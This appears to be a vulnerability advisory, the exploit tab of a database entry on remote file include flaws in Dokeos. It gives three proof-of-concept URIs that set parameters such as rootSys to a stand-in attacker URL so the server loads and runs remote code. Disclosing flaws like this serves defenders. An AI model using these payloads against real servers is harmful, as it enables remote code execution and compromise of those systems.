• info
• discussion
• exploit
• solution
• references

Dokeos Multiple Remote File Includes Vulnerabilities

These issues can be exploited through a web client.

The following proof-of-concept URIs are available:

http://www.example.com/path/claroline/exercice/testheaderpage.php?rootSys=http://EvElCoDe.txt?
http://www.example.com/path/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://EvElCoDe.txt?
http://www.example.com/path/claroline/tracking/userLog.php?rootSys=http://EvElCoDe.txt?